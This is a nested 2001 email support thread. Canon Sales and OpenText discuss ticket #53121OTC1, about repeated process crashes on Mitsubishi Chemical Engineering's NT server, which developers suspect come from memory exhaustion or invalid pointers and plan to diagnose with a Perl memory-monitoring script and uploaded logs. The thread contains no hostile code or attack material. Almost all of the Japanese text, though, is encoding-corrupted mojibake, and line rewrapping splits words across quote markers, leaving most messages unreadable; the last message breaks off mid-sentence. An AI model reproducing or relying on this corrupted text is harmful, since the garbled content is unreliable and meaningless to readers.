&gt; &gt; &gt; &gt; ã¾ã§ã«ãŠçŸ¥ã‚‰ã›ãã ã•ã„ã€‚
&gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; &gt; &gt; &gt; ä¼Šè—¤ã€€æ­£ç¾©
&gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; -------- Original Message --------
&gt; &gt; &gt; &gt; Subject: RE: ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„ã¦
&gt; &gt; &gt; &gt;  - ticket #53121OTC1 -
&gt; &gt; &gt; &gt; Date: Fri, 12 Oct 2001 13:33:26 -0400
&gt; &gt; &gt; &gt; From: "Hitoshi Ito" &lt;&gt;
&gt; &gt; &gt; &gt; Reply-To: &lt;&gt;
&gt; &gt; &gt; &gt; To: "'it-oh'" &lt;&gt;
&gt; &gt; &gt; &gt; CC: &lt;&gt;,
&gt; &gt; &gt; &gt; &lt;&gt;,&lt;
&gt; &gt; &gt; &gt; &gt;, &lt;&gt;
&gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; &gt; &gt; &gt; &gt; ä¼Šè—¤æ§˜
&gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; OpenTextã®ä¼Šæ±ã§ã™ã€‚ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; ãŸã ã„ã¾é–‹ç™ºã®ã»ã†ã§æ¤œè¨¼ã—ã¦ãŠã‚Šã¾ã™ã€‚ã‚ã‹ã‚Šæ¬¡ç¬¬ãŠçŸ¥ã‚‰ã›ã„ãŸã—ã¾
&gt; &gt; ã™ã®
&gt; &gt; &gt; &gt; ã§ä»Šã—ã°
&gt; &gt; &gt; &gt; &gt; ã‚‰ããŠå¾…ã¡ä¸‹ã•ã„ã€‚
&gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; -----Original Message-----
&gt; &gt; &gt; &gt; &gt; &gt; From: it-oh [mailto:]
&gt; &gt; &gt; &gt; &gt; &gt; Sent: Friday, October 12, 2001 2:57 AM
&gt; &gt; &gt; &gt; &gt; &gt; To: Hitoshi Ito
&gt; &gt; &gt; &gt; &gt; &gt; Cc: ; ;
&gt; &gt; &gt; &gt; &gt; &gt; ;
&gt; &gt; &gt; &gt; &gt; &gt; Subject: Re:ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„ã¦
&gt; &gt; &gt; &gt;  - ticket
&gt; &gt; &gt; &gt; &gt; &gt; #53121OTC1 -
&gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; OTC/ä¼Šæ±æ§˜
&gt; &gt; &gt; &gt; &gt; &gt; ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; threadãƒ­ã‚°ã¨watch.logã‚ˆã‚Šãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„ã¦
&gt; &gt; &gt; &gt; &gt; &gt; ãªã«ã‹ã‚ã‹ã‚Šã¾ã—ãŸã§ã—ã‚‡ã†ã‹ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; æ¥é€±ã¯ã˜ã‚ã«ã€ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ã«å ±å‘Šã™ã‚‹
&gt; &gt; &gt; &gt; &gt; &gt; å¿…è¦ãŒã‚ã‚Šã¾ã™ã®ã§ã€ã”é€£çµ¡ã„ãŸã ãã‚ˆã†ãŠé¡˜ã„ã„ãŸã—ã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; &gt; &gt; &gt; &gt; &gt; ä¼Šè—¤ã€€æ­£ç¾©
&gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; -------- Original Message --------
&gt; &gt; &gt; &gt; &gt; &gt; Subject: [RE: ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„ã¦
&gt; &gt; &gt; &gt; &gt; &gt;   - ticket #53121OTC1 -]
&gt; &gt; &gt; &gt; &gt; &gt; Date: Wed, 10 Oct 2001 14:20:02 +0900
&gt; &gt; &gt; &gt; &gt; &gt; From: it-oh &lt;&gt;
&gt; &gt; &gt; &gt; &gt; &gt; To:
&gt; &gt; &gt; &gt; &gt; &gt; CC: ,
&gt; &gt; &gt; &gt; &gt; &gt; ,,
&gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; OTC/ä¼Šæ±æ§˜
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜(NT)ã«ã¦ãƒ¡ãƒ¢ãƒªç›£è¦–ã®è¨­å®šå¾Œ
&gt; &gt; &gt; &gt; &gt; &gt; &gt; 10æœˆ5æ—¥ã«ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ãŒç™ºç”Ÿã—ã¾ã—ãŸã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ãã®æ™‚ã®threadãƒ­ã‚°ã¨watch.logã‚’ftpã‚µã‚¤ãƒˆ
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ãƒ¦ãƒ¼ã‚¶ã€ã€Œmitsubishi chemical engã€å†…ã«ã‚¢ãƒƒãƒ—ãƒ­ãƒ¼ãƒ‰ã—ã¾ã—
&gt; &gt; ãŸã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ã€Œ20011005logs2.zipã€ã‚’ã”è¦§ä¸‹ã•ã„ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; watch.logã«ã¯ã€æ—¥æ™‚ãŒå‡ºåŠ›ã•ã‚Œãªã„ã®ã§ã„ã¤ã®å€¤ã‹ã‚ã‹ã‚Šã¾ã›ã‚“ãŒ
&gt; &gt; &gt; &gt; &gt; &gt; &gt; æœ€åˆã®å€¤ã¨æœ€å¾Œã®å€¤ã‚’æ¯”è¼ƒã™ã‚‹ã¨Faultsé …ç›®ãŒå¢—ãˆã¦ã„ã‚‹ä»¥å¤–ã¯ã€
&gt; &gt; &gt; &gt; &gt; &gt; &gt; å¤‰åŒ–ãŒãªã„ã‚ˆã†ã«æ€ã‚ã‚Œã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã®åŽŸå› ã«ã¤ã„ã¦ã‚ˆã‚ã—ããŠé¡˜ã„ã„ãŸã—ã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ä¼Šè—¤ã€€æ­£ç¾©
&gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; -------- Original Message --------
&gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: RE: ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„ã¦
&gt; &gt; &gt; &gt; &gt; &gt;   - ticket #53121OTC1 -
&gt; &gt; &gt; &gt; &gt; &gt; &gt; Date: Tue, 11 Sep 2001 13:31:52 -0400
&gt; &gt; &gt; &gt; &gt; &gt; &gt; From: "Hitoshi Ito" &lt;&gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; Reply-To: &lt;&gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; To: "'it-oh'" &lt;&gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; CC: &lt;&gt;,
&gt; &gt; &gt; &gt; &gt; &gt; &lt;&gt;,&lt;&gt;,
&gt; &gt; &gt; &gt; &gt; &gt;  &lt;&gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ä¼Šè—¤æ§˜
&gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; OpenTextã®ä¼Šæ±ã§ã™ã€‚ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ç¢ºèªã‚’å–ã‚Šã¾ã—ãŸãŒã€ã“ã‚Œã§é–“é•ã„ãªã„ã‚ˆã†ã§ã™ã€‚threadãƒ­ã‚°ã¨ã‚
&gt; &gt; ã‚ã›
&gt; &gt; &gt; &gt; ã¦è¦‹
&gt; &gt; &gt; &gt; &gt; &gt; ã¦ã€
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ãƒ¡ãƒ¢ãƒªã®ä½¿ç”¨çŠ¶æ³ã‚’èª¿æŸ»ã™ã‚‹ã‚ˆã†ã§ã™ã€‚éŽåŽ»ã®äº‹ä¾‹ã¾ã§ã¯ã‚ã‹ã‚Šã¾
&gt; &gt; ã›ã‚“
&gt; &gt; &gt; &gt; ã§ã—
&gt; &gt; &gt; &gt; &gt; &gt; ãŸãŒ
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ä½•åº¦ã‹åŒ—ç±³ã®ãŠå®¢æ§˜ã«å¯¾ã—ã¦ä½¿ç”¨ã•ã‚ŒãŸã“ã¨ãŒã‚ã‚‹ã‚ˆã†ã§ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚ˆã‚ã—ããŠé¡˜ã„ã—ã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message-----
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: it-oh [mailto:]
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Sent: Tuesday, September 11, 2001 4:19 AM
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To:
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Cc: ;
&gt; &gt; &gt; &gt; ;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: Re: ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„
&gt; &gt; ã¦
&gt; &gt; &gt; &gt; &gt; &gt;  - ticket
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; #53121OTC1 -
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ä¼Šæ±æ§˜
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; perlã‚’ã‚¤ãƒ³ã‚¹ãƒˆãƒ¼ãƒ«ã—ã€å¼Šç¤¾ç’°å¢ƒã§å‡ºåŠ›ã•ã‚ŒãŸwatch.logãƒ•ã‚¡ã‚¤ãƒ«
&gt; &gt; ã‚’æ·»
&gt; &gt; &gt; &gt; ä»˜ã—
&gt; &gt; &gt; &gt; &gt; &gt; ã¾ã™
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã€‚ã“ã®ãƒ•ã‚¡ã‚¤ãƒ«ã§ã‚ˆã‚ã—ã„ã§ã—ã‚‡ã†ã‹ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚ˆã‘ã‚Œã°ã€ä¸‰è±åŒ–å­¦æ§˜ã«è¨­å®šã—ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã¾ã§ãƒ­ã‚°ã‚’å‡ºåŠ›ã™
&gt; &gt; ã‚‹è¨­
&gt; &gt; &gt; &gt; å®šã«
&gt; &gt; &gt; &gt; &gt; &gt; ã—ã¦
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã„ãŸã ãã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ãªãŠã€ã“ã®ãƒ­ã‚°ã«ã¯ã€æ™‚åˆ»ãŒå‡ºåŠ›ã•ã‚Œã‚‹ã‚ˆã†ã«ãªã£ã¦ã„ã¾ã›ã‚“ãŒ
&gt; &gt; ã€ãƒ—
&gt; &gt; &gt; &gt; ãƒ­ã‚»
&gt; &gt; &gt; &gt; &gt; &gt; ã‚¹ãƒ€
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚¦ãƒ³ã¨ã®é–¢ä¿‚ãŒã‚ã‹ã‚‹ã®ã§ã—ã‚‡ã†ã‹ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ãƒ­ã‚°å†…å®¹ã®èª¬æ˜Žã¨ã€éŽåŽ»ã«ã“ã®ãƒ­ã‚°ã‹ã‚‰ã‚ã‹ã£ãŸäº‹ä¾‹ã‚’ã”é€£çµ¡ã
&gt; &gt; ã ã•
&gt; &gt; &gt; &gt; ã„ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚ˆã‚ã—ããŠé¡˜ã„ã„ãŸã—ã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ä¼Šè—¤ã€€æ­£ç¾©
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -------- Original Message --------
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: RE: ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„
&gt; &gt; ã¦
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;  - ticket #53121OTC1 -
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Date: Mon, 10 Sep 2001 15:44:26 -0400
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: "Hitoshi Ito" &lt;&gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Reply-To: &lt;&gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To: "'it-oh'" &lt;&gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; CC: &lt;&gt;,
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &lt;&gt;,&lt;&gt;,
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;  &lt;&gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ä¼Šè—¤æ§˜
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OpenTextã®ä¼Šæ±ã§ã™ã€‚ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; é–‹ç™ºã‹ã‚‰ã®è¿”äº‹ãŒã‚ã‚Šã¾ã—ãŸã®ã§ãŠçŸ¥ã‚‰ã›ã„ãŸã—ã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; They seem to have quite a few crashes when the
&gt; &gt; &gt; &gt; system seem to
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; be allocating
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; a pointer and then jumping off into the oblivion.
&gt; &gt; &gt; &gt; I'd say we
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; should get
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; them watch.pl to see if they're running out of
&gt; &gt; memory.  The
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; crashes are all
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; over the map but all of them seem to relate
&gt; &gt; back to being
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; unable to trying
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; to get memory or to having an invalid pointer
&gt; &gt; of some sort.
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã¨ã„ã†ã“ã¨ã§ã€ãƒ¡ãƒ¢ãƒªä¸è¶³ãªã©ãŒåŽŸå› ã¨ãªã£ã¦ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ãŒ
&gt; &gt; èµ·ã“
&gt; &gt; &gt; &gt; ã£ã¦
&gt; &gt; &gt; &gt; &gt; &gt; ã„ã‚‹
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã®ã§ã¯ãªã„ã‹ã¨è€ƒãˆã¦ã„ã‚‹ã‚ˆã†ã§ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; æ·»ä»˜ã®ZIPãƒ•ã‚¡ã‚¤ãƒ«ã‚’ã”å‚ç…§ä¸‹ã•ã„ã€‚èª¬æ˜Žã®Wordãƒ‰ã‚­ãƒ¥ãƒ¡ãƒ³ãƒˆãŒã‚
&gt; &gt; ã‚Šã¾
&gt; &gt; &gt; &gt; ã™ãŒ
&gt; &gt; &gt; &gt; &gt; &gt; ã€
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã“ã“ã§è¨€åŠã•ã‚Œã¦ã„ã‚‹test.plã‚¹ã‚¯ãƒªãƒ—ãƒˆã¯ã€ã‚‚ã†ä½¿ç”¨ã•ã‚Œã¦ã„ãª
&gt; &gt; ã„ã¨
&gt; &gt; &gt; &gt; ã„ã†
&gt; &gt; &gt; &gt; &gt; &gt; ã“ã¨
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã§ã™ã€‚ç§ã®Win2kç’°å¢ƒã§ã¯ã€å¤‰ã‚ã‚Šã«watchpslist.plã‚¹ã‚¯ãƒªãƒ—ãƒˆã‚’
&gt; &gt; ä½¿ç”¨
&gt; &gt; &gt; &gt; ã—
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; å‹•ä½œã‚’ç¢ºèªã„ãŸã—ã¾ã—ãŸã€‚ã”ç¢ºèªä¸‹ã•ã„ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã“ã®ã‚¹ã‚¯ãƒªãƒ—ãƒˆã‚’ä½¿ç”¨ã—ã€ä¸‰è±åŒ–å­¦æ§˜ã®ã‚µã‚¤ãƒˆã§ãƒ­ã‚°ã‚’å–å¾—å¾Œã€
&gt; &gt; &gt; &gt; threadãƒ­
&gt; &gt; &gt; &gt; &gt; &gt; ã‚°
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã¨watch.logã‚’ã“ã¡ã‚‰ã¾ã§ãŠé€ã‚Šä¸‹ã•ã„ã€‚ã‚ˆã‚ã—ããŠé¡˜ã„è‡´ã—ã¾ã™
&gt; &gt; ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message-----
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: Hitoshi Ito [mailto:]
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Sent: Friday, September 07, 2001 4:38 PM
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To: 'it-oh'
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Cc: '';
&gt; &gt; &gt; &gt; &gt; &gt; '';
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ''; ''
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: RE: ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤
&gt; &gt; ã„ã¦
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;  - ticket
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; #53121OTC1 -
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ä¼Šè—¤æ§˜
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OpenTextã®ä¼Šæ±ã§ã™ã€‚ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã“ã®ä»¶ã«é–¢ã—ã¾ã—ã¦ãƒžãƒãƒ¼ã‚¸ãƒ£ãƒ¼ã¾ã§å ±å‘Šã—ã€ä¸‰è±é›»æ©Ÿæ§˜ã®æ™‚
&gt; &gt; ã®ã‚ˆ
&gt; &gt; &gt; &gt; ã†ã«
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚·ã‚«ã‚´ã®é–‹ç™ºã®ã»ã†ã¸ãƒ­ã‚°ã‚’é€ã‚Šèª¿æŸ»ã•ã›ã‚‹ã“ã¨ã«ãªã‚Šã¾ã—ãŸ
&gt; &gt; ã€‚ä½•
&gt; &gt; &gt; &gt; ã‹ã‚
&gt; &gt; &gt; &gt; &gt; &gt; ã‹ã‚Š
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; æ¬¡ç¬¬ã”é€£çµ¡ã„ãŸã—ã¾ã™ã®ã§ã€ä»Šã—ã°ã‚‰ããŠå¾…ã¡ãã ã•ã„ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚ˆã‚ã—ããŠé¡˜ã„è‡´ã—ã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message-----
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: it-oh [mailto:]
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Sent: Friday, September 07, 2001 4:34 AM
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To:
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Cc: ;
&gt; &gt; &gt; &gt; &gt; &gt; ;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„
&gt; &gt; ã¦
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OTC/ä¼Šæ±æ§˜
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜(NTãƒ¦ãƒ¼ã‚¶)ã«ã¦ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³
&gt; &gt; ãŒå¤š
&gt; &gt; &gt; &gt; ç™ºã—
&gt; &gt; &gt; &gt; &gt; &gt; ã¦ã„
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã¾
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã™
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ï¼–æœˆï¼’ï¼–æ—¥ã‹ã‚‰ï¼˜æœˆï¼‘ï¼æ—¥ã¾ã§ã®ãƒ­ã‚°ãŒä¸€åº¦ã«é€ã‚‰ã‚Œã¦ãã¾
&gt; &gt; ã—ãŸ
&gt; &gt; &gt; &gt; ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Solarisç’°
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; å¢ƒ
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã®ä¸‰è±é›»æ©Ÿæ§˜ã‚ˆã‚Šãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã®é »åº¦ãŒé«˜ã„ã§ã™ã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ãƒ­ã‚°ã¯ã€ftpã‚µã‚¤ãƒˆã€Œã€ãƒ¦ãƒ¼ã‚¶ã®ã€Œmitsubishi
&gt; &gt; cemical engã€
&gt; &gt; &gt; &gt; ãƒ•ã‚©
&gt; &gt; &gt; &gt; &gt; &gt; ãƒ«ãƒ€
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; å†…
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã«
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ã‚¢ãƒƒãƒ—ã—ã¾ã—ãŸã€‚
&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; é€”ä¸­ã§çµ‚äº†ã—ã¦ã„ã‚‹threadãƒ­ã‚°ã®æœ€çµ‚å‡¦ç†ã¯ã€ã•ã¾ã–ã¾ãªãƒ‘
